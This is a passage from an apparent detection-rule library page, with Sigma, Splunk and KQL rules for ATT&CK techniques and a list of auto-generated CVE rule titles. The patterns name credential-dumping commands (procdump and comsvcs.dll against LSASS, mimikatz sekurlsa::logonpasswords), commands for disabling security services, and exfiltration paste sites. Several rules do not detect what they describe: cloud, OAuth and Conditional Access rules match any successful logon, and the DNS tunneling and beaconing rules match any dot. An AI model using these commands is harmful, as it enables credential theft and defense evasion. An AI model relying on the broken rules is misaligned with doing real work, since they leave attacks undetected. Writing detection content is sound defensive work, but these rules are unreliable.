condition: selection
falsepositives:
- Legitimate administrative activityNote: Any new admin account outside change management windows is suspicious. Correlate with helpdesk tickets.
Outbound Data Transfer Spike
T1048 — Exfiltration Over Alternative Protocol
Detects anomalous outbound data transfer volume — may indicate data exfiltration to external destinations.
title: Outbound Data Transfer Spike
id: scw-t1048-ub4y
status: stable
level: high
description: |
Detects anomalous outbound data transfer volume — may indicate data exfiltration to external destinations.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.exfiltration
- attack.t1048
logsource:
category: firewall
detection:
selection:
action: 'allowed'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Requires baseline of normal transfer volumes. Focus on transfers to rare destinations during off-hours.
DNS Tunneling – Anomalous Query Volume
T1048.003 — Exfiltration Over Alternative Protocol: DNS
Detects excessive DNS queries to a single domain — may indicate DNS tunneling for data exfiltration or C2 communication.
title: DNS Tunneling – Anomalous Query Volume
id: scw-t1048-003-ub4y
status: stable
level: high
description: |
Detects excessive DNS queries to a single domain — may indicate DNS tunneling for data exfiltration or C2 communication.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.dns_tunneling
- attack.t1048.003
logsource:
category: dns
detection:
selection:
query|contains:
- '.'
condition: selection | count(query) by dst_domain > 50
falsepositives:
- Legitimate administrative activityNote: Look for high query volume to newly registered domains with high entropy subdomains.
Exfiltration to Cloud Storage
T1567.002 — Exfiltration Over Web Service: Cloud Storage
Detects data uploads to public cloud storage services — may indicate exfiltration to attacker-controlled cloud storage.
title: Exfiltration to Cloud Storage
id: scw-t1567-002-ub4y
status: stable
level: high
description: |
Detects data uploads to public cloud storage services — may indicate exfiltration to attacker-controlled cloud storage.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.cloud_storage
- attack.t1567.002
logsource:
category: proxy
detection:
selection:
dst_domain|contains:
- 'dropbox.com'
- 'drive.google.com'
- 'mega.nz'
- 'transfer.sh'
- 'sendspace.com'
- 'anonfiles.com'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Whitelist sanctioned cloud storage. Focus on uploads during off-hours or by service accounts.
Email Exfiltration – Mass Forward Rule
T1114.003 — Email Collection: Email Forwarding Rule
Detects creation of email forwarding rules to external addresses — a stealthy exfiltration technique for ongoing data theft.
title: Email Exfiltration – Mass Forward Rule
id: scw-t1114-003-ub4y
status: stable
level: high
description: |
Detects creation of email forwarding rules to external addresses — a stealthy exfiltration technique for ongoing data theft.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.email_forwarding
- attack.t1114.003
logsource:
category: email
detection:
selection:
action|contains:
- 'forward'
- 'redirect'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Monitor for rules forwarding to external domains. Particularly suspicious when created by compromised accounts.
Ransomware – Mass File Encryption Pattern
T1486 — Data Encrypted for Impact
Detects mass file rename operations with common ransomware extensions — indicates active encryption in progress.
title: Ransomware – Mass File Encryption Pattern
id: scw-t1486-ub4y
status: stable
level: critical
description: |
Detects mass file rename operations with common ransomware extensions — indicates active encryption in progress.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.ransomware
- attack.t1486
logsource:
category: file_event
detection:
selection:
TargetFilename|endswith:
- '.encrypted'
- '.locked'
- '.crypto'
- '.crypt'
- '.enc'
condition: selection
falsepositives:
- Legitimate administrative activityNote: CRITICAL — if this fires, initiate incident response immediately. Isolate affected hosts.
Phishing – OAuth Consent Grant Attack
T1528 — Steal Application Access Token
Detects suspicious OAuth consent grants — attackers trick users into granting malicious apps access to their cloud data.
title: Phishing – OAuth Consent Grant Attack
id: scw-t1528-ub4y
status: stable
level: high
description: |
Detects suspicious OAuth consent grants — attackers trick users into granting malicious apps access to their cloud data.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.oauth
- attack.t1528
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Monitor for consent grants to unverified apps. Implement admin consent workflow in Azure AD.
Phishing – Suspicious Email Attachment Execution
T1566.001 — Phishing: Spearphishing Attachment
Detects execution of processes spawned by email clients or Office applications opening attachments — classic phishing payload delivery.
title: Phishing – Suspicious Email Attachment Execution
id: scw-t1566-001-ub4z
status: stable
level: high
description: |
Detects execution of processes spawned by email clients or Office applications opening attachments — classic phishing payload delivery.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.phishing
- attack.t1566.001
logsource:
category: process_creation
detection:
selection:
ParentImage|endswith:
- '\outlook.exe'
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\POWERPNT.EXE'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\wscript.exe'
- '\mshta.exe'
condition: selection
falsepositives:
- Legitimate administrative activityNote: High-fidelity rule. Office spawning cmd/powershell is almost always malicious in enterprise environments.
Cloud – S3 Bucket Made Public
T1530 — Data from Cloud Storage
Detects AWS S3 bucket policy changes that make a bucket publicly accessible — a critical cloud misconfiguration.
title: Cloud – S3 Bucket Made Public
id: scw-t1530-ub4z
status: stable
level: critical
description: |
Detects AWS S3 bucket policy changes that make a bucket publicly accessible — a critical cloud misconfiguration.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.aws
- attack.t1530
logsource:
category: webserver
detection:
selection:
cs-method: 'PUT'
cs-uri|contains:
- 'policy'
- 'acl'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Block public S3 access at the organization level. Any public bucket alert requires immediate investigation.
Cloud – New IAM User Created with Admin
T1136.003 — Create Account: Cloud Account
Detects creation of IAM users with administrative privileges — may indicate an attacker establishing persistent cloud access.
title: Cloud – New IAM User Created with Admin
id: scw-t1136-003-ub4z
status: stable
level: high
description: |
Detects creation of IAM users with administrative privileges — may indicate an attacker establishing persistent cloud access.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.iam
- attack.t1136.003
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: All new admin accounts should go through change management. Alert on any created outside approved processes.
Cloud – Azure AD Conditional Access Disabled
T1562.001 — Impair Defenses: Disable or Modify Tools
Detects disabling of Azure AD Conditional Access policies — weakens security posture and may indicate compromised admin account.
title: Cloud – Azure AD Conditional Access Disabled
id: scw-t1562-001-ub4z
status: stable
level: critical
description: |
Detects disabling of Azure AD Conditional Access policies — weakens security posture and may indicate compromised admin account.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.azure_ad
- attack.t1562.001
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Conditional Access changes should be strictly controlled. Monitor for policy deletions and modifications.
Cloud – GCP Firewall Rule Opened to World
T1562.007 — Impair Defenses: Disable or Modify Cloud Firewall
Detects GCP firewall rules being modified to allow traffic from 0.0.0.0/0 — exposing services to the entire internet.
title: Cloud – GCP Firewall Rule Opened to World
id: scw-t1562-007-ub4z
status: stable
level: critical
description: |
Detects GCP firewall rules being modified to allow traffic from 0.0.0.0/0 — exposing services to the entire internet.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.gcp
- attack.t1562.007
logsource:
category: firewall
detection:
selection:
action: 'allowed'
src_ip: '0.0.0.0'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Block 0.0.0.0/0 ingress rules at the organization policy level. Any such rule is a critical misconfiguration.
Cloud – AWS Root Account Used
T1078.004 — Valid Accounts: Cloud Accounts
Detects usage of the AWS root account — root should almost never be used in production. May indicate credential compromise.
title: Cloud – AWS Root Account Used
id: scw-t1078-004-ub4z
status: stable
level: critical
description: |
Detects usage of the AWS root account — root should almost never be used in production. May indicate credential compromise.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.aws
- attack.t1078.004
logsource:
category: authentication
detection:
selection:
User: 'root'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: AWS root account should only be used for initial setup. Enable MFA and alert on any usage.
C2 – Network Beaconing Pattern
T1071.001 — Application Layer Protocol: Web Protocols
Detects regular periodic network connections — consistent intervals suggest automated C2 beaconing behavior.
title: C2 – Network Beaconing Pattern
id: scw-t1071-001-ub50
status: stable
level: high
description: |
Detects regular periodic network connections — consistent intervals suggest automated C2 beaconing behavior.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.beaconing
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
dst_domain|contains:
- '.'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Use statistical analysis to detect regular intervals. Focus on connections to low-reputation domains.
C2 – Tor Network Connection
T1090.003 — Proxy: Multi-hop Proxy
Detects connections to known Tor entry/exit nodes — may indicate C2 communication or data exfiltration through the Tor network.
title: C2 – Tor Network Connection
id: scw-t1090-003-ub50
status: stable
level: high
description: |
Detects connections to known Tor entry/exit nodes — may indicate C2 communication or data exfiltration through the Tor network.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.tor
- attack.t1090.003
logsource:
category: firewall
detection:
selection:
dst_port:
- '9001'
- '9030'
- '9050'
- '9051'
- '9150'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Block Tor at the firewall level. Any successful connection is a policy violation in most enterprises.
Initial Access – Exposed RDP to Internet
T1133 — External Remote Services
Detects RDP connections from external IP addresses — exposed RDP is a top initial access vector for ransomware gangs.
title: Initial Access – Exposed RDP to Internet
id: scw-t1133-ub50
status: stable
level: critical
description: |
Detects RDP connections from external IP addresses — exposed RDP is a top initial access vector for ransomware gangs.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.rdp
- attack.t1133
logsource:
category: firewall
detection:
selection:
action: 'allowed'
dst_port: '3389'
condition: selection
falsepositives:
- Legitimate administrative activityNote: NEVER expose RDP directly to the internet. Use VPN or Azure Bastion. This is the #1 ransomware entry point.
Initial Access – VPN Login from Unusual Country
T1133 — External Remote Services
Detects VPN authentication from unexpected geographic locations — may indicate stolen VPN credentials being used from abroad.
title: Initial Access – VPN Login from Unusual Country
id: scw-t1133-ub50
status: stable
level: high
description: |
Detects VPN authentication from unexpected geographic locations — may indicate stolen VPN credentials being used from abroad.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.vpn
- attack.t1133
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'success'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Requires geo-IP enrichment. Maintain a list of expected countries and alert on deviations.
Discovery – BloodHound/SharpHound Execution
T1087.002 — Account Discovery: Domain Account
Detects execution of BloodHound or SharpHound — Active Directory reconnaissance tools used by attackers to map attack paths.
title: Discovery – BloodHound/SharpHound Execution
id: scw-t1087-002-ub50
status: stable
level: critical
description: |
Detects execution of BloodHound or SharpHound — Active Directory reconnaissance tools used by attackers to map attack paths.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.bloodhound
- attack.t1087.002
logsource:
category: process_creation
detection:
selection:
Image|endswith:
- '\SharpHound.exe'
- '\BloodHound.exe'
CommandLine|contains:
- 'SharpHound'
- 'BloodHound'
- 'Invoke-BloodHound'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Zero legitimate use in most environments. Immediate incident response trigger.
Discovery – Mass Internal Port Scanning
T1046 — Network Service Discovery
Detects a single host making connections to many internal ports — indicates network reconnaissance or worm propagation.
title: Discovery – Mass Internal Port Scanning
id: scw-t1046-ub50
status: stable
level: high
description: |
Detects a single host making connections to many internal ports — indicates network reconnaissance or worm propagation.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.port_scan
- attack.t1046
logsource:
category: firewall
detection:
selection:
action: 'allowed'
condition: selection | count(dst_port) by src_ip > 20
falsepositives:
- Legitimate administrative activityNote: Exclude vulnerability scanners and monitoring tools. Focus on workstation-to-workstation scanning.
Execution – MSHTA Abuse
T1218.005 — System Binary Proxy Execution: Mshta
Detects mshta.exe executing remote or suspicious HTA content — a common Living-off-the-Land technique for code execution.
title: Execution – MSHTA Abuse
id: scw-t1218-005-ub50
status: stable
level: high
description: |
Detects mshta.exe executing remote or suspicious HTA content — a common Living-off-the-Land technique for code execution.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.mshta
- attack.t1218.005
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'http'
- 'javascript:'
- 'vbscript:'
condition: selection
falsepositives:
- Legitimate administrative activityNote: mshta.exe with network or script arguments is almost always malicious. Consider blocking mshta.exe via AppLocker.
Execution – DLL Side-Loading
T1574.002 — Hijack Execution Flow: DLL Side-Loading
Detects suspicious DLL loading from non-standard paths — may indicate DLL side-loading used for code execution and evasion.
title: Execution – DLL Side-Loading
id: scw-t1574-002-ub51
status: stable
level: medium
description: |
Detects suspicious DLL loading from non-standard paths — may indicate DLL side-loading used for code execution and evasion.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.dll_sideload
- attack.t1574.002
logsource:
category: image_load
detection:
selection:
ImageLoaded|contains:
- '\AppData\Local\Temp\'
- '\Users\Public\'
- '\ProgramData\'
condition: selection
falsepositives:
- Legitimate administrative activityNote: Focus on DLLs loaded from temp directories by signed executables. Cross-reference with known vulnerable applications.
Impact – Mass Account Lockout
T1531 — Account Access Removal
Detects mass account lockouts — may indicate a password spray attack or intentional disruption of user access.
title: Impact – Mass Account Lockout
id: scw-t1531-ub51
status: stable
level: high
description: |
Detects mass account lockouts — may indicate a password spray attack or intentional disruption of user access.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.account_lockout
- attack.t1531
logsource:
category: authentication
detection:
selection:
EventType: 'Logon'
action: 'failure'
condition: selection | count(User) by src_ip > 10
falsepositives:
- Legitimate administrative activityNote: Differentiate between targeted spray (few attempts per account) and lockout attack (many attempts per account).
Impact – Mass File Deletion
T1485 — Data Destruction
Detects mass file deletion operations — may indicate ransomware, destructive malware, or insider threat activity.
title: Impact – Mass File Deletion
id: scw-t1485-ub51
status: stable
level: critical
description: |
Detects mass file deletion operations — may indicate ransomware, destructive malware, or insider threat activity.
author: SCW Detection Vault
date: 2025-01-15
references:
- https://shimiscyberworld.com/detections/
tags:
- attack.file_deletion
- attack.t1485
logsource:
category: file_event
detection:
selection:
TargetFilename|endswith:
- '.bak'
- '.sql'
- '.mdf'
- '.xlsx'
- '.docx'
- '.pdf'
condition: selection
falsepositives:
- Legitimate administrative activityNote: CRITICAL — mass deletion of business files requires immediate response. Check for ransomware indicators.
LSASS Process Memory Dump Attempt
T1003.001 — OS Credential Dumping: LSASS Memory
Detects attempts to dump the memory of the Local Security Authority Subsystem Service (LSASS) process, which stores sensitive credentials. Attackers often do this to steal hashes or plaintext passwords for lateral movement.
index=windows sourcetype=WinEventLog:Security OR sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
(EventCode=4688 OR EventID=1)
(
CommandLine IN ("*procdump.exe -accepteula*", "*comsvcs.dll MiniDump*", "*taskmgr.exe /dmp*", "*dbghelp.dll*") AND
(CommandLine="*lsass.exe*" OR ParentCommandLine="*lsass.exe*")
) OR (
CommandLine="*mimikatz.exe*" AND CommandLine="*sekurlsa::logonpasswords*"
)
| stats count by _time, Host, User, CommandLine, ParentCommandLine, Image, ParentImage
| sort -_timeNote: Procdump often requires the `-accepteula` flag on first run. `taskmgr.exe /dmp` is a legitimate way to dump processes but is rare for LSASS by normal users. `rundll32.exe comsvcs.dll` is another common method. False positives may occur if legitimate administrators are performing incident response activities. Exclude known administrative accounts or specific hosts where this activity is sanctioned. Ensure Sysmon Event ID 1 (Process Create) is enabled and collected for comprehensive detection.
Security Service Disable Attempt
T1562.002 — Impair Defenses: Disable or Modify Tools
Identifies attempts to stop or disable critical security services like antivirus, EDR, or Windows Defender. This is a common defense evasion technique used by attackers to hinder detection and remediation.
index=windows sourcetype=WinEventLog:Security OR sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
(EventCode=4688 OR EventID=1)
(
CommandLine="*sc.exe* stop*" OR CommandLine="*sc.exe* disable*" OR CommandLine="*sc.exe* delete*" OR
CommandLine="*Set-Service* -Name* -Status Stopped*" OR CommandLine="*Set-Service* -Name* -StartupType Disabled*" OR
CommandLine="*Stop-Service* -Name*" OR
CommandLine="*net stop*" OR
CommandLine="*taskkill* /im*" OR
CommandLine="*reg add* *Start* /v 4*" OR CommandLine="*reg add* *DisableAntiSpyware* /v 1*"
)
(
CommandLine IN ("*WinDefend*", "*MsMpEng*", "*SenseNdr*", "*wscsvc*", "*Sophos*", "*CrowdStrike*", "*CarbonBlack*", "*Defender*", "*AVService*", "*EDRService*", "*Kaspersky*", "*McAfee*", "*Symantec*") OR
ParentCommandLine IN ("*WinDefend*", "*MsMpEng*", "*SenseNdr*", "*wscsvc*", "*Sophos*", "*CrowdStrike*", "*CarbonBlack*", "*Defender*", "*AVService*", "*EDRService*", "*Kaspersky*", "*McAfee*", "*Symantec*")
)
| stats count by _time, Host, User, CommandLine, ParentCommandLine, Image, ParentImage
| sort -_timeNote: This rule detects common command-line patterns used to stop or disable services, including Windows Defender and common EDR/AV products. False positives can occur if legitimate administrators manage services via command line. Baseline normal administrative activity and exclude known privileged accounts or specific scripts. Ensure Sysmon Event ID 1 (Process Create) is enabled and collected. The list of service names is illustrative and should be customized to your environment's deployed security software.
Outbound Connection to Public Text Sharing Service
T1102.002 — Web Service: Bidirectional Communication
Monitors for outbound network connections to well-known public text sharing or paste services. Attackers often leverage these services for command and control (C2) communication, data staging, or exfiltration, as they are commonly allowed by firewalls.
index=<your_network_index> sourcetype=<your_proxy_or_firewall_sourcetype>
(dest_ip=* OR url=*)
(
dest="*pastebin.com*" OR url="*pastebin.com*" OR
dest="*pastie.org*" OR url="*pastie.org*" OR
dest="*github.com/gist*" OR url="*github.com/gist*" OR
dest="*controlc.com*" OR url="*controlc.com*" OR
dest="*privnote.com*" OR url="*privnote.com*" OR
dest="*anonfiles.com*" OR url="*anonfiles.com*"
)
| stats count by _time, src_ip, dest_ip, url, user
| sort -_timeNote: This rule requires network proxy or firewall logs that capture destination domains/URLs and source IPs. Customize `index` and `sourcetype` fields to match your environment. False positives can occur if legitimate users access these sites for benign purposes. Consider whitelisting specific users or source IPs that have a business need to access these services. A high volume of connections or connections from non-browser processes should increase suspicion.
Suspicious Scheduled Task Creation
T1053.005 — Scheduled Task/Job: Scheduled Task
Detects the creation of new scheduled tasks that include suspicious keywords or are created by unusual processes. Scheduled tasks are a common persistence mechanism for attackers to maintain access to a compromised system.
DeviceProcessEvents
| where ActionType == "ProcessCreated"
| where InitiatingProcessCommandLine contains "schtasks.exe"
| where InitiatingProcessCommandLine contains " /create"
| where InitiatingProcessCommandLine contains " /tn " // Task Name
| where InitiatingProcessCommandLine contains " /tr " // Task Run
| where InitiatingProcessCommandLine has_any ("powershell.exe", "cmd.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe", "certutil.exe", "invoke-expression", "iex", "system32\\config\\systemprofile\\desktop", "c:\\users\\public\\", "c:\\programdata\\", "$env:temp\\", "net user", "net localgroup")
| extend TaskName = extract(@"/tn\s+""?([^""]+)""?", 1, InitiatingProcessCommandLine)
| extend TaskAction = extract(@"/tr\s+""?([^""]+)""?", 1, InitiatingProcessCommandLine)
| project-reorder TimeGenerated, DeviceName, InitiatingProcessAccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, TaskName, TaskAction, FolderPath
| sort by TimeGenerated descNote: This rule leverages `DeviceProcessEvents` to look for `schtasks.exe /create` commands that contain suspicious keywords often associated with malicious activity or common attacker tools. False positives can occur from legitimate system administration or software installations. Exclude known administrative scripts, specific users, or parent processes that routinely create scheduled tasks. Focus on tasks created in unusual directories or by non-service accounts. Ensure endpoint detection and response (EDR) data (like Microsoft Defender for Endpoint, which feeds DeviceProcessEvents) is collected.
System Information Discovery via WMIC
T1082 — System Information Discovery
Detects the use of `wmic.exe` to query system information. Attackers frequently use WMIC to gather details about the compromised system, including hardware, software, user accounts, and network configurations, as part of their reconnaissance phase.
logsource:
product: windows
service: sysmon
category: process_creation
detection:
selection:
Image|endswith: '\wmic.exe'
CommandLine|contains:
- 'computersystem get'
- 'os get'
- 'qfe get'
- 'product get'
- 'process get'
- 'useraccount get'
- 'group get'
- 'nicconfig get'
- 'logicaldisk get'
- 'service get'
- 'shadowcopy get'
- 'path get'
condition: selectionNote: This rule monitors for common `wmic.exe` commands used for system reconnaissance. WMIC is a legitimate tool, so false positives are possible from system administrators, monitoring tools, or legitimate scripts. Baseline common WMIC usage in your environment. Consider whitelisting specific scripts or users that frequently execute these commands. Focus on executions from unusual user accounts, processes, or in rapid succession. Ensure Sysmon Event ID 1 (Process Create) is enabled and collected.
CVE-2026-40165: SAML NameID XML Comment Injection in authentik
🌐 NVDT1190 — Initial Access
Auto-generated from authentik Authentication Bypass: SAML NameID XML Comment ...
🛡️ 2 more rules via /detect
CVE-2026-40092: Nimiq Node Crash via Malformed Kademlia DHT Record
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40092: Nimiq Blockchain Node Crash Vulnerability
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-9141
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-9141: Taiko AG1000-01A SMS Gateway Critical Auth...
🛡️ 3 more rules via /detect
CVE-2026-9139 Taiko AG1000-01A Hardcoded Credentials Exposure
🌐 NVDT1190 — Initial Access
Auto-generated from Taiko AG1000-01A SMS Gateway Critical Hard-Coded Credenti...
🛡️ 2 more rules via /detect
CVE-2026-9126 Google Chrome Use-After-Free RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Google Chrome Use-After-Free (CVE-2026-9126) Allows RCE
🛡️ 2 more rules via /detect
CVE-2026-9120 - Google Chrome WebRTC Use-After-Free RCE
🌐 NVDT1190 — Initial Access
Auto-generated from Google Chrome WebRTC Use-After-Free: Remote Code Execution
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-9119
🌐 NVDT1190 — Initial Access
Auto-generated from Google Chrome WebRTC Heap Overflow Allows Sandbox Escape
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-9114
🌐 NVDT1190 — Initial Access
Auto-generated from Google Chrome: High-Severity QUIC Vulnerability Allows Re...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-9112
🌐 NVDT1190 — Initial Access
Auto-generated from Google Chrome GPU Use-After-Free: Remote Code Execution v...
🛡️ 2 more rules via /detect
CVE-2026-9111 - Google Chrome WebRTC Use-After-Free RCE
🌐 NVDT1204.002 — Execution
Auto-generated from Google Chrome WebRTC Use-After-Free: Critical RCE Threat ...
🛡️ 2 more rules via /detect
CVE-2026-45444: Unrestricted File Upload in Gift Cards for WooCommerce Pro
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45444: Critical File Upload Flaw in Gift Cards F...
🛡️ 2 more rules via /detect
CVE-2026-39310 - Trilium Notes Unauthenticated Clipper API Access
🌐 NVDT1190 — Initial Access
Auto-generated from Trilium Notes Authentication Bypass (CVE-2026-39310) Expo...
🛡️ 2 more rules via /detect
CVE-2026-24188 - NVIDIA TensorRT Out-of-Bounds Write
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA TensorRT Out-of-Bounds Write (CVE-2026-24188) Pose...
🛡️ 2 more rules via /detect
C2 Beacon Detection — HTTP to Suspicious Domain
🌐 NVDT1071.001 — Command and Control
Auto-generated from Splunk Enterprise, Cloud Vulnerability Exposes Session Co...
🛡️ 1 more rules via /detect
CVE-2026-7613 - PixelYourSite Stored XSS via csvdata parameter
🌐 NVDT1190 — Initial Access
Auto-generated from PixelYourSite WordPress Plugin Vulnerable to Stored XSS (...
🛡️ 2 more rules via /detect
CVE-2026-20223: Unauthenticated Cisco Secure Workload REST API Access
🌐 NVDT1190 — Initial Access
Auto-generated from Cisco Secure Workload Critical RCE: Unauthenticated Site ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-8598
🌐 NVDT1190 — Initial Access
Auto-generated from ZKTeco CCTV Cameras: Unauthenticated Port Exposes Critica...
🛡️ 3 more rules via /detect
CVE-2025-32750 - Dell PowerFlex Manager Directory Listing
🌐 NVDT1190 — Initial Access
Auto-generated from Dell PowerFlex Manager: Directory Listing Vulnerability E...
🛡️ 1 more rules via /detect
BIND 9 Assertion Failure due to Non-Internet CLASS DNS Query - CVE-2026-5946
🌐 NVDT1190 — Initial Access
Auto-generated from BIND 9 Assertion Failure: CVE-2026-5946 Impacts DNS Handling
🛡️ 2 more rules via /detect
CVE-2026-45584 - Microsoft Defender Heap Buffer Overflow - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Defender Heap Buffer Overflow Allows Remote Cod...
🛡️ 1 more rules via /detect
Privilege Escalation via Azure Portal WAC Link Following - CVE-2026-42834
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Azure Portal Windows Admin Center Link Following Vulnerab...
🛡️ 1 more rules via /detect
CVE-2026-42383 - YITH WooCommerce Product Add-Ons Blind SQLi
🌐 NVDT1190 — Initial Access
Auto-generated from YITH WooCommerce Product Add-Ons Blind SQLi (CVE-2026-42383)
🛡️ 2 more rules via /detect
CVE-2026-41091: Microsoft Defender Privilege Escalation via Improper Link Handling
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Microsoft Defender Vulnerability CVE-2026-41091: Local Pr...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-3593
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3593: BIND 9 DNS-over-HTTPS Use-After-Free Vulne...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-3039
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-3039: BIND Servers Face High-Severity Memory Exh...
🛡️ 2 more rules via /detect
CVE-2026-29518 Rsync TOCTOU Privilege Escalation Attempt
🌐 NVDT1200 — Privilege Escalation
Auto-generated from Rsync CVE-2026-29518: TOCTOU Flaw Allows Privilege Escala...
🛡️ 2 more rules via /detect
DoS Traffic Pattern Detection
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-9064: 389-ds-base Denial-of-Service Vulnerabilit...
CVE-2026-41054: Unprivileged User Executing haveged Commands
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-41054: Local Privilege Escalation in haveged
🛡️ 1 more rules via /detect
CVE-2026-5200 - AcyMailing Subscriber Level Configuration Modification
🌐 NVDT1190 — Initial Access
Auto-generated from AcyMailing WordPress Plugin Vulnerable to Admin Takeover ...
🛡️ 2 more rules via /detect
CVE-2026-47784: Memcached SASL Password Timing Side Channel
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-47784: Memcached Timing Side Channel Exposes Pas...
🛡️ 1 more rules via /detect
Memcached SASL Credential Guessing Attempt - CVE-2026-47783
🌐 NVDT1190 — Initial Access
Auto-generated from memcached Timing Side Channel (CVE-2026-47783) Allows SAS...
🛡️ 1 more rules via /detect
CVE-2026-9057 - Talend Administration Center Update URL Modification
🌐 NVDT1190 — Initial Access
Auto-generated from Talend Administration Center: Broken Access Control Allow...
🛡️ 1 more rules via /detect
CVE-2026-7522: WordPress Advanced Database Cleaner LFI via 'template' parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7522: WordPress Advanced Database Cleaner Plugin...
🛡️ 1 more rules via /detect
CVE-2026-9010 - Boost WordPress Plugin Unauthenticated SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Boost WordPress Plugin: Unauthenticated SQLi Exposes Data...
🛡️ 1 more rules via /detect
TONNET E-LAN SQLi Attempt (CVE-2026-9003) - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from TONNET E-LAN Hybrid Recording System SQLi (CVE-2026-9003)
🛡️ 2 more rules via /detect
CVE-2026-7637 - Boost WordPress Plugin PHP Object Injection via Cookie
🌐 NVDT1190 — Initial Access
Auto-generated from Boost WordPress Plugin Vulnerable to PHP Object Injection
🛡️ 2 more rules via /detect
NVIDIA Triton DALI Backend Integer Overflow - RCE Attempt - CVE-2026-24214
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA Triton Inference Server: Integer Overflow Leads to...
🛡️ 2 more rules via /detect
CVE-2026-24213 - NVIDIA Triton DALI Backend Out-of-Bounds Read
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA Triton Inference Server: Out-of-Bounds Read Leads ...
🛡️ 2 more rules via /detect
NVIDIA Triton Inference Server Integer Overflow DoS Attempt - CVE-2026-24210
🌐 NVDT1499 — Impact
Auto-generated from NVIDIA Triton Inference Server DoS Vulnerability: CVE-202...
🛡️ 1 more rules via /detect
CVE-2026-24209 - NVIDIA Triton Inference Server Path Traversal DoS
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA Triton Inference Server: Path Traversal Exposes Do...
🛡️ 1 more rules via /detect
CVE-2026-24207 - NVIDIA Triton Inference Server Authentication Bypass
🌐 NVDT1190 — Initial Access
